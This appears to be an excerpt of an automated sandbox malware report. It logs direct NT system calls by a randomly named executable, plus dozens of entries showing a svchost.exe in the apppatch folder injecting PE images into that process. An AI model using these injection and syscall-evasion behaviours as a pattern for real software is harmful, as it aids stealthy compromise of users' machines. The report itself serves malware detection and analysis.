Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtDeviceIoControlFile: Direct from: 0x77542AEC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtAllocateVirtualMemory: Direct from: 0x77542BEC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtQueryVolumeInformationFile: Direct from: 0x77542F2C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtSetInformationFile: Direct from: 0x77542D0C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtOpenSection: Direct from: 0x77542E0C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtQuerySystemInformation: Direct from: 0x775448CC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtSetInformationThread: Direct from: 0x775363F9
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtClose: Direct from: 0x77542B6C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtCreateKey: Direct from: 0x77542C6C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtSetInformationThread: Direct from: 0x77542B4C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtQueryAttributesFile: Direct from: 0x77542E6C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtOpenKeyEx: Direct from: 0x77543C9C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtQueryInformationProcess: Direct from: 0x77542C26
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtDelayExecution: Direct from: 0x77542DDC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtEnumerateKey: Direct from: 0x77542DBC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtAllocateVirtualMemory: Direct from: 0x77542BFC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtQuerySystemInformation: Direct from: 0x1C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtQuerySystemInformation: Direct from: 0x77542DFC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtWriteFile: Direct from: 0x77542AFC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtResumeThread: Direct from: 0x775436AC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtAllocateVirtualMemory: Direct from: 0x7754309C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtUnmapViewOfSection: Direct from: 0x77542D3C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtNotifyChangeKey: Direct from: 0x77543C2C
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtCreateMutant: Direct from: 0x775435CC
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeNtMapViewOfSection: Direct from: 0x77542D1C
Injects a PE file into a foreign processes
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1342000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2D02000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2262000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 24B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2C72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 622000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 2702000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 28D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 27F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: E82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DB2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1272000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11F2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A42000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 12B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: E52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1252000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BB2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1422000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1212000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15C2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1222000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 602000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1092000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 15E2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1392000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 11C2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 6D2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 872000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EA2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1302000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 602000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1592000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: BE2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: B12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: CF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1452000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D22000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A12000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: EF2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: A82000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: DC2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: C52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D52000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: F72000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1272000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1552000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1252000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: E92000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: AD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 832000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: FD2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 14A2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 9B2000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1432000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 602000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: D62000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 892000 value starts with: 4D5AJump to behavior
Source: C:\Windows\apppatch\svchost.exeMemory written: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe base: 1332000 value starts with: 4D5AJump to behavior
